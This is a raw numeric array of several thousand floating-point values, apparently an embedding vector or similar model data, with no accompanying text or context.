[ -0.03237413987517357, 0.02330276370048523, -0.0010493012377992272, 0.009244382381439209, 0.017766663804650307, 0.01708969473838806, -0.0018419186817482114, 0.0458834245800972, -0.005246506538242102, 0.02230987511575222, -0.002845148555934429, 0.013403978198766708, 0.00026702648028731346, -0.009831087663769722, 0.011433247476816177, 0.03123081661760807, -0.0051261563785374165, -0.020745325833559036, 0.0036462279967963696, -0.034901492297649384, 0.03417938947677612, -0.04061811417341232, -0.009530212730169296, 0.026868131011724472, -0.01845867745578289, 0.017525963485240936, -0.003725207643583417, 0.014088468626141548, 0.0011066555744037032, 0.032885629683732986, 0.015720713883638382, 0.020670106634497643, -0.011831906624138355, 0.02008340135216713, 0.04389765113592148, -0.00021825185103807598, 0.041580915451049805, 0.0619802325963974, -0.01097441278398037, -0.015585321001708508, -0.014720305800437927, -0.04248353838920593, -0.03324667736887932, 0.00601373752579093, 0.021512556821107864, 0.024085037410259247, 0.00362366228364408, -0.007800182327628136, -0.04422861337661743, 0.009169163182377815, 0.03086976706981659, -0.04227292537689209, -0.01208012830466032, -0.05493976175785065, -0.012034997344017029, -0.053104422986507416, 0.04362686350941658, -0.0059798890724778175, 0.0008400991791859269, 0.05126908794045448, 0.013802637346088886, 0.03454044088721275, -0.015901239588856697, 0.017571095377206802, 0.009447472169995308, 0.032795365899801254, -0.008695284835994244, 0.03001227416098118, 0.006965254433453083, 0.03715805336833, -0.0057091014459729195, -0.01647290214896202, -0.007299977820366621, 0.020414363592863083, 0.02303197607398033, -0.04871165007352829, 0.05530080944299698, 0.017450746148824692, 0.0029805421363562346, 0.012192956171929836, -0.06992333382368088, 0.0508478619158268, -0.0025931657291948795, 0.01832328364253044, 0.018804682418704033, -0.006510181352496147, -0.039835840463638306, -0.06805790960788727, -0.0010718669509515166, -0.032524578273296356, 0.0011113567743450403, 0.042212750762701035, 0.011290331371128559, 0.008093534968793392, 0.028357461094856262, -0.005964845418930054, -0.03357763960957527, -0.02083558775484562, -0.03345729038119316, -0.007582047954201698, -0.0409189909696579, -0.036104992032051086, -0.015720713883638382, 0.013193365186452866, 0.004313794430345297, 0.005551142152398825, 0.04019688814878464, -0.02778579853475094, 0.00434012059122324, 0.13310706615447998, 0.04200213775038719, 0.009139075875282288, -0.019391389563679695, 0.015480014495551586, 0.01134298462420702, 0.05466897413134575, -0.02901938557624817, -0.031290993094444275, -0.0339386910200119, -0.017195001244544983, -0.008537326008081436, -0.020850632339715958, -0.02975652925670147, 0.0010793887777253985, -0.01307301502674818, 0.06062629818916321, -0.014727827161550522, -0.005370617378503084, -0.03547315299510956, -0.0019190178718417883, -0.03038836643099785, 0.0075670043006539345, 0.017405614256858826, -0.016894126310944557, 0.005445836111903191, -0.010538144037127495, -0.011719077825546265, 0.03664656728506088, -0.011012022383511066, 0.032765280455350876, -0.06890035420656204, -0.04792937636375427, 0.03174230456352234, -0.012666834518313408, -0.006299568805843592, -0.007243563886731863, 0.007394001353532076, 0.011275287717580795, -0.053375210613012314, 0.003080206923186779, 0.0090563353151083, -0.026597343385219574, 0.016051677986979485, 0.013862811960279942, 0.0517805740237236, -0.00854484736919403, 0.0056451656855642796, 0.031290993094444275, -0.031682129949331284, 0.0022133111488074064, -0.01809762604534626, -0.03324667736887932, 0.021858563646674156, -0.011734122410416603, -0.01981261372566223, -0.033788252621889114, 0.042694151401519775, 0.02886894904077053, 0.010432837530970573, 0.017871970310807228, 0.009838609956204891, -0.001587115228176117, 0.019481651484966278, 0.03396878018975258, -0.013953074812889099, -0.014524737372994423, 0.014547302387654781, 0.03496166691184044, -0.0359545536339283, -0.01623220182955265, 0.0029222476296126842, 0.015224271453917027, -0.007307499647140503, -0.0022151917219161987, -0.0020722760818898678, -0.009560300968587399, 0.026958392933011055, -0.027349529787898064, 0.020263925194740295, -0.04335607588291168, -0.0022208329755812883, 0.008469629101455212, 0.01823301985859871, -0.018789639696478844, 0.04606395214796066, -0.014487127773463726, -0.02688317373394966, 0.0022151917219161987, 0.0027266789693385363, -0.014757915399968624, 0.02850789949297905, -0.007882922887802124, 0.014742870815098286, -0.009372253902256489, -0.03282545506954193, 0.0034506593365222216, -0.019541826099157333, 0.02962113544344902, 0.006337177939713001, -0.006577877793461084, -0.030147667974233627, -0.02838754840195179, 0.026567256078124046, 0.006442484445869923, 0.013546893373131752, 0.007965663447976112, -0.018187889829277992, -0.021527601405978203, 0.0002595046244096011, -0.019767481833696365, 0.02713891863822937, -0.01139563787728548, 0.030463585630059242, -0.018443632870912552, -0.00026420579524710774, -0.030087491497397423, -0.016698557883501053, -0.001154607511125505, -0.010079310275614262, 0.016021588817238808, 0.016548121348023415, 0.010297444649040699, 0.016081765294075012, 0.0078152259811759, -0.0064274403266608715, 0.013546893373131752, -0.0053179641254246235, -0.0072886948473751545, 0.0002787794219329953, -0.007852835580706596, 0.0034450178500264883, 0.04621438682079315, -0.011305375024676323, -0.026868131011724472, -0.007544438820332289, 0.0678773820400238, -0.04028715193271637, -0.004934348631650209, -0.026822999119758606, 0.056323785334825516, 0.031050292775034904, -0.02465669997036457, -0.009214294143021107, -0.019887832924723625, -0.016518034040927887, -0.00008244677883340046, 0.029470698907971382, 0.029771573841571808, -0.017014477401971817, -0.038120850920677185, -0.021647950634360313, -0.006780968513339758, -0.022595707327127457, -0.025484105572104454, 0.012320827692747116, -0.02913973666727543, -0.00002879466956073884, 0.014863220974802971, 0.012621702626347542, -0.0030219124164432287, 0.0030049881897866726, -0.00035000217030756176, -0.03123081661760807, -0.024235475808382034, -0.012960187159478664, 0.003700761590152979, -0.014073424972593784, 0.001987654948607087, 0.018127713352441788, -0.0029166063759475946, -0.0027943758759647608, -0.01307301502674818, -0.018909988924860954, 0.019632088020443916, 0.017887014895677567, 0.006709510926157236, 0.01121511310338974, 0.010274878703057766, -0.0004600095562636852, 0.020655063912272453, 0.005415748804807663, 0.05132926255464554, -0.035021841526031494, 0.019978094846010208, 0.02465669997036457, 0.003881286596879363, -0.004189683124423027, 0.021106375381350517, -0.027454836294054985, 0.017541008070111275, -0.033758167177438736, 0.030899854376912117, -0.021136462688446045, -0.007830269634723663, -0.033667903393507004, 0.03454044088721275, -0.033156417310237885, 0.018248064443469048, 0.01455482468008995, 0.006912601180374622, 0.028598161414265633, -0.06020507216453552, -0.03321659192442894, -0.015826020389795303, -0.004294989630579948, -0.002489740028977394, -0.022716056555509567, -0.009131553582847118, -0.0038549599703401327, 0.025318624451756477, -0.019496694207191467, 0.02999722957611084, -0.026221249252557755, -0.000013045748346485198, 0.030328191816806793, -0.0030858484096825123, -0.023257631808519363, 0.0356837660074234, -0.0637253075838089, 0.022339962422847748, 0.001607800368219614, -0.021031158044934273, 0.018789639696478844, -0.0286432933062315, 0.026822999119758606, -0.0485612116754055, -0.013095580972731113, 0.008529803715646267, 0.010019134730100632, -0.019511738792061806, 0.008319191634654999, 0.0070968871004879475, 0.02527349442243576, 0.0029673788230866194, -0.01171155646443367, -0.008981116116046906, 0.005208896938711405, -0.0018409783951938152, 0.01426147110760212, 0.000791677157394588, 0.0008791189175099134, 0.010801409371197224, 0.02751501090824604, 0.02962113544344902, 0.029064517468214035, 0.02989192306995392, -0.0011038348311558366, -0.010372662916779518, 0.01820293255150318, -0.012599137611687183, 0.01859406940639019, -0.018940076231956482, 0.019421476870775223, 0.010297444649040699, -0.0055962735787034035, 0.014961005188524723, -0.017300307750701904, -0.010545666329562664, -0.00108503014780581, -0.003072685096412897, 0.008176276460289955, 0.023498332127928734, -0.026055768132209778, 0.03553332760930061, 0.008981116116046906, -0.015434883534908295, 0.02901938557624817, 0.039113741368055344, -0.0070893652737140656, 0.008432019501924515, -0.04260388761758804, 0.02107628807425499, 0.025213317945599556, -0.04149065166711807, -0.010131962597370148, 0.01115493755787611, -0.007683593314141035, 0.042814500629901886, -0.010244791395962238, -0.0054533579386770725, -0.06865965574979782, 0.01799231953918934, -0.022234655916690826, -0.06793756037950516, -0.018744507804512978, 0.05641404911875725, -0.03806067630648613, -0.0146902184933424, -0.0025743611622601748, -0.03381834179162979, 0.027966324239969254, -0.025454018265008926, -0.001974491635337472, 0.009680650196969509, -0.0029523351695388556, 0.03962522745132446, 0.004291228484362364, -0.0034957905299961567, 0.013336281292140484, -0.004223531577736139, 0.024716874584555626, -0.001505314838141203, -0.0286432933062315, 0.025860199704766273, 0.023754075169563293, 0.026431862264871597, 0.004539450630545616, 0.03727840259671211, -0.017510920763015747, 0.06378548592329025, -0.024205386638641357, -0.012335872277617455, 0.001440438674762845, 0.013847768306732178, 0.04871165007352829, -0.0014827492414042354, 0.008890854194760323, -0.015795933082699776, 0.048170074820518494, -0.0324644036591053, 0.0004541330854408443, -0.012531440705060959, -0.010959369130432606, -0.0244159996509552, 0.02552923746407032, -0.03998627886176109, -0.06083691120147705, -0.05220180004835129, -0.011290331371128559, 0.0010239150142297149, -0.016397682949900627, 0.029711399227380753, 0.01120759081095457, 0.022580662742257118, 0.03676691651344299, -0.040949076414108276, -0.008838200941681862, -0.012681878171861172, 0.026055768132209778, -0.013885377906262875, 0.00594980176538229, 0.009770913049578667, 0.021873606368899345, -0.023723987862467766, 0.004753823857754469, 0.00446423189714551, 0.011854471638798714, -0.0026627429760992527, 0.023588594049215317, 0.028914080932736397, 0.00023635134857613593, 0.013411499559879303, -0.009169163182377815, 0.01907547004520893, 0.02641681768000126, 0.007514351047575474, -0.013253540731966496, -0.01909051463007927, 0.008981116116046906, -0.018804682418704033, 0.020173663273453712, 0.012463743798434734, -0.004242336377501488, -0.0016745569882914424, -0.01969226449728012, 0.023889468982815742, 0.005994932726025581, -0.014035815373063087, 0.005257789511233568, -0.04982488602399826, -0.012200478464365005, -0.005942279938608408, -0.01426147110760212, 0.012381003238260746, -0.021407250314950943, 0.004501841031014919, -0.0004031253920402378, -0.007322543300688267, -0.006653096526861191, -0.011388115584850311, 0.020775413140654564, -0.00248033762909472, 0.0029184867162257433, 0.0002545683819334954, 0.0229417122900486, -0.010147007182240486, -0.006544029805809259, -0.006596682593226433, 0.028553029522299767, 0.008853244595229626, 0.015675583854317665, -0.03258475288748741, 0.0324644036591053, 0.0007347929640673101, 0.03851199150085449, -0.031772393733263016, -0.015901239588856697, 0.030568892136216164, -0.009876219555735588, 0.012719487771391869, -0.011666425503790379, -0.025258449837565422, -0.017375526949763298, -0.048290424048900604, -0.005900909658521414, -0.027800843119621277, 0.024957574903964996, -0.002459652489051223, 0.016803864389657974, 0.018187889829277992, -0.02814684994518757, 0.007017907686531544, -0.029816705733537674, 0.0188498143106699, -0.012614181265234947, 0.04326581209897995, 0.011666425503790379, 0.028929123654961586, 0.022490400820970535, -0.009906306862831116, 0.010628406889736652, -0.017887014895677567, -0.02749996818602085, 0.029831748455762863, -0.0027812125626951456, -0.007913010194897652, -0.0010455403244122863, 0.01623220182955265, -0.007724963594228029, 0.01257657166570425, -0.026010636240243912, 0.03423956781625748, -0.022776231169700623, 0.015780890360474586, -0.011553596705198288, 0.030809592455625534, 0.015141530893743038, 0.01332123763859272, -0.007578287273645401, -0.00836432259529829, -0.004802715964615345, -0.014765436761081219, -0.004671083297580481, 0.015434883534908295, 0.01444199588149786, 0.018443632870912552, 0.008146188221871853, 0.0258902870118618, -0.0006257258355617523, 0.015231792815029621, -0.0010878508910536766, 0.020038269460201263, -0.005457119084894657, -0.027319442480802536, 0.0009637399925850332, -0.0034957905299961567, 0.0046786051243543625, -0.009169163182377815, -0.022520488128066063, -0.01760118268430233, 0.009853653609752655, -0.004689887631684542, 0.027484923601150513, -0.00455449428409338, 0.006303329486399889, 0.009891263209283352, 0.013607067987322807, 0.0006670961156487465, -0.03818102926015854, -0.021136462688446045, -0.011719077825546265, -0.025469062849879265, -0.004043006803840399, 0.016773777082562447, 0.0018325162818655372, -0.01662333868443966, 0.00006540503818541765, 0.02056480012834072, -0.029275130480527878, -0.019271038472652435, 0.0032701343297958374, -0.00039395809289999306, 0.011252721771597862, -0.01907547004520893, 0.007822748273611069, -0.01308053731918335, -0.005746711045503616, 0.003554085036739707, 0.015096399001777172, 0.023754075169563293, -0.036616478115320206, 0.03992610052227974, -0.004892978351563215, -0.03646603971719742, -0.03499175235629082, 0.006811056286096573, -0.000844330235850066, -0.0006492316606454551, -0.025709761306643486, 0.039234090596437454, 0.015201705507934093, 0.030809592455625534, 0.05126908794045448, 0.00868024118244648, 0.012569050304591656, 0.008304147981107235, 0.027169005945324898, -0.00418592244386673, -0.0014536019880324602, 0.0072623686864972115, 0.019376344978809357, -0.017826838418841362, 0.019541826099157333, -0.026732737198472023, 0.009281991049647331, 0.021993957459926605, 0.01041779387742281, -0.0339386910200119, 0.005656448658555746, -0.01308053731918335, -0.0229417122900486, 0.020038269460201263, 0.0007456056773662567, -0.04347642511129379, -0.0301175806671381, 0.010124441236257553, 0.023197457194328308, -0.00787540152668953, -0.009763391688466072, 0.0015636093448847532, -0.013847768306732178, -0.002235876861959696, -0.038993388414382935, -0.016803864389657974, -0.011290331371128559, -0.011688990518450737, -0.00860502291470766, -0.005186331458389759, -0.01760118268430233, 0.01381768099963665, -0.01823301985859871, -0.014111033640801907, 0.0062581985257565975, 0.008589979261159897, 0.030072448775172234, -0.00892846379429102, 0.022655881941318512, 0.027800843119621277, -0.0009985286742448807, -0.013802637346088886, -0.0022828883957117796, -0.02861320599913597, -0.0059874108992516994, -0.0236788559705019, 0.006754641886800528, 0.010598319582641125, -0.008462106809020042, 0.017751621082425117, -0.005543620325624943, -0.002123048761859536, 0.006626770365983248, -0.015886196866631508, 0.017541008070111275, 0.015449927188456059, -0.018909988924860954, -0.011643859557807446, -0.01734543964266777, 0.00873289443552494, -0.01363715622574091, -0.005088547244668007, -0.005389422178268433, -0.03294580429792404, 0.010590797290205956, -0.008860766887664795, -0.006186740472912788, 0.0012091411044821143, 0.004990762565284967, -0.014991093426942825, -0.023754075169563293, -0.021647950634360313, 0.02068515121936798, -0.0014714663848280907, 0.02403990551829338, 0.035142190754413605, -0.0312609039247036, -0.041701264679431915, 0.017766663804650307, -0.00040665126289241016, -0.012538962066173553, -0.005065981298685074, -0.027545100077986717, 0.02913973666727543, 0.0042874678038060665, 0.0015429242048412561, -0.002269725315272808, 0.00470869243144989, 0.0004955033655278385, -0.002901562489569187, 0.03132107853889465, -0.01555523369461298, -0.00910898856818676, 0.02679291181266308, -0.02009844407439232, 0.017571095377206802, -0.015276923775672913, -0.02343815565109253, 0.01541983988136053, -0.025378799065947533, 0.0012260653311386704, 0.01919581927359104, 0.0023731510154902935, -0.04371712729334831, -0.011358028277754784, -0.026747779920697212, 0.011831906624138355, 0.0005664910422638059, 0.004310033284127712, 0.016021588817238808, 0.010756278410553932, 0.013140711933374405, -0.02057984471321106, -0.03408912941813469, 0.023242587223649025, 0.0114708561450243, -0.002375031355768442, 0.021106375381350517, 0.012749575078487396, 0.025303581729531288, 0.025950461626052856, 0.023633725941181183, -0.006671901326626539, 0.011493422091007233, -0.01934625767171383, -0.0213320329785347, 0.011726600117981434, -0.023588594049215317, 0.016773777082562447, 0.00823645107448101, -0.02217448130249977, 0.0011075958609580994, 0.023408068343997, 0.033036068081855774, 0.006980298087000847, -0.040708377957344055, 0.002371270442381501, -0.007913010194897652, 0.021738212555646896, -0.042333099991083145, 0.023468244820833206, 0.0008838200592435896, -0.0007879161857999861, -0.01809762604534626, 0.0024577719159424305, -0.0026589820627123117, -0.009831087663769722, -0.0013877855380997062, 0.014893308281898499, -0.03198300302028656, 0.016051677986979485, -0.011410681530833244, -0.0003909023362211883, -0.013592024333775043, -0.024355825036764145, -0.01982765831053257, 0.02467174455523491, 0.002843267982825637, 0.004953153431415558, 0.023844337090849876, 0.01881972700357437, -0.016337508335709572, -0.02169308252632618, 0.020233837887644768, -0.03535280376672745, 0.0291096493601799, 0.02070019394159317, -0.009575344622135162, 0.03442009165883064, 0.0009077960858121514, -0.005359334405511618, 0.013403978198766708, 0.008943507447838783, -0.007254846394062042, 0.030583936721086502, -0.016924213618040085, -0.016578208655118942, -0.016638383269309998, 0.022159438580274582, -0.008191320113837719, -0.014645086601376534, -0.01134298462420702, -0.0070968871004879475, 0.04582324996590614, -0.008574935607612133, -0.03553332760930061, -0.037489015609025955, -0.007457937113940716, -0.013185843825340271, 0.039234090596437454, -0.013057971373200417, 0.003990353550761938, 0.0026138508692383766, -0.006284525152295828, 0.010244791395962238, -0.026612386107444763, 0.01412607729434967, -0.011967300437390804, 0.012200478464365005, -0.024205386638641357, -0.01686403900384903, 0.01555523369461298, -0.011297853663563728, 0.003232524963095784, 0.015224271453917027, -0.044950712472200394, 0.03932435065507889, 0.006559073459357023, 0.02328771911561489, 0.026492036879062653, 0.004900500178337097, 0.03553332760930061, -0.018909988924860954, -0.011877037584781647, -0.012606658972799778, 0.03183256834745407, 0.02255057543516159, 0.021241769194602966, -0.01195225678384304, -0.021753257140517235, -0.010823975317180157, 0.021362120285630226, -0.033397115767002106, -0.032043177634477615, -0.00666061881929636, -0.03664656728506088, -0.0038361551705747843, -0.03956505283713341, -0.005438314285129309, -0.00831166934221983, 0.015284446068108082, 0.0012251250445842743, -0.014253949746489525, 0.014795524068176746, 0.0021945065818727016, 0.02402486279606819, -0.015156574547290802, 0.0027680492494255304, -0.011267765425145626, -0.005235223565250635, 0.028568074107170105, -0.006690706126391888, 0.038241203874349594, 0.006969015579670668, 0.0024295649491250515, 0.010116918943822384, -0.0018795280484482646, 0.0001289296051254496, 0.007755051366984844, -0.037609364837408066, -0.0070893652737140656, -0.02825215458869934, -0.029922010377049446, -0.010169572196900845, -0.005630122032016516, 0.030523760244250298, -0.014637565240263939, 0.0012251250445842743, 0.006916362326592207, -0.009680650196969509, -0.007724963594228029, -0.004498079884797335, -0.014111033640801907, 0.025108011439442635, -0.007213476113975048, -0.01034257560968399, 0.02018870785832405, -0.007717441767454147, 0.009470038115978241, -0.043446339666843414, -0.05021602287888527, 0.026446904987096786, -0.003571009263396263, -0.022746143862605095, -0.04967445135116577, -0.0020215034019201994, 0.00879306998103857, 0.050877951085567474, 0.013968118466436863, -0.028823817148804665, -0.00027196272276341915, 0.008356801234185696, -0.01426147110760212, -0.02030905708670616, 0.00047011705464683473, 0.005220179911702871, -0.028808774426579475, 0.0009675009059719741, 0.03791024163365364, -0.006972776260226965, -0.011079719290137291, 0.00747298076748848, 0.01996305026113987, 0.004204727243632078, -0.024852268397808075, -0.025378799065947533, -0.021587776020169258, -0.01585610769689083, -0.024626612663269043, 0.037880152463912964, -0.02083558775484562, 0.06516950577497482, 0.014750393107533455, 0.015525146387517452, -0.0044567096047103405, 0.03432982787489891, 0.012629224918782711, -0.01226817537099123, -0.03454044088721275, -0.003911374136805534, 0.009139075875282288, 0.010244791395962238, -0.008785547688603401, -0.02405495010316372, -0.008040882647037506, 0.02950078621506691, 0.02279127575457096, -0.005359334405511618, 0.0021963869221508503, -0.005648926831781864, -0.006134087685495615, -0.021632906049489975, -0.0012420492712408304, 0.020008182153105736, 0.021963870152831078, 0.012320827692747116, -0.007792660500854254, 0.0461542122066021, 0.002867714036256075, -0.024957574903964996, -0.025935418903827667, -0.03640586510300636, -0.01202747505158186, -0.01972235180437565, -0.034149304032325745, -0.01696934551000595, -0.01860911399126053, 0.04528167471289635, -0.01832328364253044, -0.005972367245703936, -0.002954215742647648, 0.011297853663563728, 0.007837791927158833, 0.042573802173137665, -0.023708943277597427, -0.019361300393939018, 0.006224350072443485, 0.015043745748698711, -0.048651475459337234, 0.01599150151014328, -0.026010636240243912, -0.023889468982815742, 0.010673537850379944, -0.022716056555509567, 0.020294014364480972, 0.0441383495926857, 0.017435701563954353, 0.05226197466254234, -0.019752439111471176, -0.016548121348023415, 0.004637234844267368, -0.010312488302588463, 0.01698439009487629, -0.012997796759009361, 0.020233837887644768, -0.017315352335572243, -0.03174230456352234, -0.013125668279826641, -0.00042663124622777104, 0.026296468451619148, -0.012727009132504463, -0.01376502774655819, 0.003027553902938962, 0.015946371480822563, 0.02563454397022724, -0.036526214331388474, 0.020534712821245193, -0.01357698068022728, -0.001750716008245945, -0.03763945400714874, -0.046424999833106995, -0.044950712472200394, -0.01097441278398037, -0.03553332760930061, 0.006987819913774729, -0.022535530850291252, -0.0034713444765657187, -0.009545257315039635, 0.012147825211286545, 0.01555523369461298, -0.006671901326626539, 0.027695536613464355, -0.015826020389795303, -0.0048704128712415695, 0.005385661032050848, -0.021753257140517235, -0.000027222717108088546, -0.015276923775672913, -0.0203241016715765, 0.014848177321255207, 0.005712862592190504, 0.03309624269604683, 0.00006781438423786312, 0.0022396377753466368, -0.019376344978809357, 0.032404229044914246, 0.01748083345592022, 0.03396878018975258, -0.009011204354465008, 0.019436519593000412, -0.00185226125176996, 0.04973462596535683, 0.017917102202773094, -0.008883331902325153, 0.019932962954044342, 0.0010464806109666824, -0.002831985242664814, -0.014961005188524723, 0.011846950277686119, -0.019737394526600838, -0.015510102733969688, -0.012456221505999565, 0.032795365899801254, 0.005156244151294231, -0.03733857721090317, -0.026085855439305305, -0.0029128454625606537, 0.0018945718184113503, 0.010681060142815113, 0.02107628807425499, -0.0016698557883501053, 0.0029147258028388023, 0.00199893768876791, -0.019526783376932144, 0.042934849858284, -0.00041064724791795015, -0.020233837887644768, -0.01065849419683218, -0.0026100899558514357, 0.001957567408680916, 0.00978595670312643, -0.010086831636726856, -0.01984270103275776, -0.032043177634477615, 0.007420327980071306, -0.024867312982678413, -0.01984270103275776, -0.04323572665452957, 0.007172105833888054, 0.030568892136216164, -0.0003431854711379856, 0.009492604061961174, -0.0009256604826077819, 0.0033603967167437077, -0.011688990518450737, -0.030960028991103172, 0.024867312982678413, -0.026672562584280968, 0.020008182153105736, -0.002252801088616252, -0.016909170895814896, -0.0030181515030562878, -0.00036528095370158553, -0.02774066850543022, 0.003896330250427127, 0.01575080305337906, -0.041219864040613174, 0.019978094846010208, -0.0009571583359502256, -0.022475356236100197, 0.017811795696616173, -0.00910146627575159, -0.031080380082130432, -0.02489740028977394, -0.008657676167786121, -0.031772393733263016, -0.0324644036591053, 0.005284115672111511, 0.027229180559515953, 0.051389437168836594, 0.020850632339715958, -0.018774595111608505, -0.0027473641093820333, -0.005178809631615877, 0.005998693872243166, -0.00613032653927803, 0.0014789883280172944, -0.0015636093448847532, 0.028568074107170105, 0.02689821831882, 0.01921086385846138, -0.0011216993443667889, -0.018037451431155205, -0.003247568616643548, 0.0007225699373520911, -0.004584581591188908, -0.0030463587027043104, -0.0034506593365222216, 0.030283061787486076, 0.001489330898039043, 0.013712374493479729, 0.023272674530744553, -0.013215931132435799, 0.025228362530469894, -0.008251494728028774, -0.005840734578669071, -0.02229483239352703, -0.008665197528898716, -0.006961493752896786, -0.00805592630058527, -0.01134298462420702, -0.0030294344760477543, -0.0004538980429060757, 0.02094089426100254, -0.008206363767385483, 0.02724422514438629, -0.02913973666727543, -0.005464640911668539, -0.024115124717354774, 0.022881537675857544, 0.011455812491476536, -0.00854484736919403, -0.013749984093010426, -0.004836564417928457, -0.03920400142669678, 0.027214135974645615, -0.0027887343894690275, -0.002297932282090187, -0.0017977276584133506, -0.01859406940639019, -0.03658638894557953, 0.021768299862742424, 0.03499175235629082, -0.008574935607612133, 0.028914080932736397, 0.021467424929142, 0.010335053317248821, 0.0029598569963127375, -0.011794297024607658, -0.025484105572104454, 0.004693648777902126, 0.005690297111868858, -0.00678849034011364, 0.008845722302794456, -0.034781139343976974, -0.011305375024676323, 0.007548199500888586, -0.008266538381576538, 0.026702649891376495, -0.00923686008900404, 0.0028940406627953053, 0.007078082766383886, -0.0029391718562692404, 0.02206917479634285, 0.036526214331388474, -0.018518852069973946, 0.013155755586922169, -0.01468269620090723, -0.013065493665635586, 0.015013658441603184, 0.024461131542921066, -0.023152325302362442, 0.013599546626210213, -0.009402341209352016, 0.023468244820833206, -0.010327531956136227, -0.0035484435502439737, -0.0010229747276753187, 0.0011442649411037564, 0.00604006415233016, 0.0022998126223683357, 0.021121419966220856, 0.016382640227675438, 0.0078152259811759, 0.020624976605176926, -0.0071457792073488235, -0.02578498050570488, -0.004227292723953724, 0.0016416488215327263, 0.004279945977032185, 0.002444608835503459, 0.03297588974237442, 0.010387706570327282, -0.009515169076621532, 0.004723736084997654, 0.004415339324623346, 0.019917920231819153, -0.0015927565982565284, -0.0037966654635965824, -0.029199911281466484, -0.04025706648826599, 0.015570277348160744, -0.0327351912856102, -0.008808113634586334, 0.01189208123832941, 0.007800182327628136, -0.022370049729943275, -0.00024916205438785255, -0.04573298990726471, -0.029079562053084373, -0.010056744329631329, 0.023242587223649025, -0.0015194183215498924, -0.0005368737038224936, 0.022746143862605095, -0.009274469688534737, -0.02143733762204647, 0.02789110504090786, 0.039354439824819565, 0.010823975317180157, 0.00505093764513731, -0.008717850781977177, -0.00854484736919403, 0.028176937252283096, -0.013358846306800842, 0.038993388414382935, -0.01746578887104988, 0.011538553051650524, -0.010207181796431541, -0.01684899628162384, 0.031531691551208496, 0.029771573841571808, 0.031290993094444275, 0.0008786487742327154, -0.02429565042257309, 0.00923686008900404, -0.001060584094375372, 0.012110215611755848, -0.0027492446824908257, -0.002109885448589921, -0.004998284857720137, 0.015525146387517452, 0.034630704671144485, 0.006134087685495615, 0.008785547688603401, 0.005438314285129309, -0.03604481741786003, -0.027710581198334694, 0.0027229180559515953, -0.0033923648297786713, 0.007202193606644869, 0.016337508335709572, -0.004163356963545084, 0.013622112572193146, 0.044168438762426376, 0.01575080305337906, -0.06745615601539612, -0.02316736988723278, -0.015826020389795303, -0.011455812491476536, 0.008755460381507874, 0.009740825742483139, -0.008973594754934311, 0.007036712486296892, 0.02802649885416031, -0.01115493755787611, -0.01097441278398037, 0.0014094109646975994, -0.018669288605451584, -0.01946660690009594, 0.01972235180437565, -0.003915134817361832, -0.0024352064356207848, 0.02715396136045456, -0.025454018265008926, 0.024641655385494232, -0.006374787539243698, -0.01910555735230446, 0.016638383269309998, -0.0019857746083289385, 0.028327373787760735, -0.02727431245148182, -0.026251336559653282, -0.020594889298081398, -0.012072606012225151, 0.009462516754865646, -0.009176685474812984, -0.004686126951128244, 0.008341757580637932, 0.0018419186817482114, 0.0035202365834265947, -0.002264083828777075, -0.0028018977027386427, -0.004050528630614281, -0.02592037431895733, -0.00607767328619957, 0.010380185209214687, -0.009334644302725792, -0.007277412340044975, -0.021136462688446045, 0.003177991369739175, 0.029711399227380753, 0.0028620727825909853, 0.0026947110891342163, 0.008153710514307022, 0.02429565042257309, 0.0008452704641968012, -0.006585400085896254, 0.02045949548482895, -0.020730283111333847, 0.02799641154706478, -0.002023383742198348, -0.0042874678038060665, -0.0012298262445256114, 0.01450217142701149, 0.017826838418841362, -0.010267356410622597, -0.005295398645102978, 0.011200069449841976, -0.017556052654981613, 0.006352221593260765, 0.026612386107444763, -0.011327940970659256, -0.001350176171399653, -0.02169308252632618, -0.002382553182542324, -0.0016999433282762766, -0.015066311694681644, -0.01957191340625286, 0.013486718758940697, -0.024385912343859673, -0.013862811960279942, -0.0003869063511956483, -0.010906715877354145, -0.00028700646362267435, -0.001269316067919135, 0.012147825211286545, 0.005889626685529947, 0.02852294221520424, -0.004103181883692741, 0.0117040341719985, -0.009530212730169296, 0.0018466198816895485, -0.004174639470875263, 0.015886196866631508, 0.003713924903422594, -0.004389013163745403, 0.021016113460063934, 0.018127713352441788, 0.02453635074198246, -0.012147825211286545, 0.010455403476953506, 0.008507238700985909, -0.0246867872774601, 0.020640019327402115, -0.0141862528398633, -0.00399787537753582, 0.005648926831781864, -0.00044896180042997, 0.006999102886766195, -0.004750062711536884, 0.016156982630491257, 0.003012510249391198, -0.015337099321186543, 0.005915953312069178, -0.0038700036238878965, -0.019436519593000412, -0.01859406940639019, 0.003236285876482725, -0.008161231875419617, 0.020384276285767555, 0.030929941684007645, -0.030147667974233627, 0.00842449814081192, 0.0023957164958119392, -0.02391955628991127, -0.011388115584850311, -0.032163530588150024, 0.006517703179270029, 0.01684899628162384, 0.002371270442381501, -0.006965254433453083, -0.01897016353905201, 0.021873606368899345, -0.01283983699977398, -0.0064500062726438046, 0.0376996286213398, 0.0018861097050830722, -0.004731258377432823, 0.012478787451982498, 0.004825281444936991, 0.021858563646674156, -0.003422452136874199, -0.003251329530030489, -0.011673946864902973, 0.012471265159547329, 0.0023524658754467964, -0.004964436404407024, -0.0033528748899698257, 0.02131698839366436, -0.014231383800506592, -0.020655063912272453, -0.024265563115477562, 0.022746143862605095, 0.00997400376945734, -0.001093492261134088, -0.009801000356674194, -0.0030670438427478075, -0.01587115228176117, 0.02652212418615818, -0.003839916316792369, -0.01869937591254711, -0.031411342322826385, 0.006367265712469816, -0.0034544202499091625, -0.0016670351615175605, -0.00569781893864274, -0.003964026924222708, -0.029681311920285225, 0.009567822329699993, 0.03050871752202511, 0.02501774951815605, 0.006671901326626539, 0.009086422622203827, -0.0027548859361559153, -0.0018701256485655904, 0.008612544275820255, -0.004389013163745403, -0.007755051366984844, -0.03643595427274704, 0.030583936721086502, -0.012147825211286545, 0.014900830574333668, 0.028778687119483948, -0.00653650751337409, 0.03297588974237442, 0.0029034430626779795, 0.012493831105530262, -0.039865925908088684, -0.0018108909716829658, -0.029064517468214035, -0.026612386107444763, 0.013862811960279942, 0.012869925238192081, 0.011576162651181221, 0.024882355704903603, -0.012418612837791443, 0.015118964947760105, -0.025002706795930862, -0.027349529787898064, -0.005863300058990717, 0.02121168188750744, -0.009515169076621532, 0.016548121348023415, 0.01523931510746479, -0.01597645878791809, -0.0007225699373520911, 0.00749930739402771, -0.015901239588856697, -0.019857745617628098, 0.0025724805891513824, 0.005152483005076647, 0.004656039644032717, -0.007683593314141035, 0.009808522649109364, 0.03390860557556152, 0.0045996252447366714, -0.017932144924998283, 0.050998300313949585, 0.012727009132504463, -0.014103512279689312, 0.0049268268048763275, 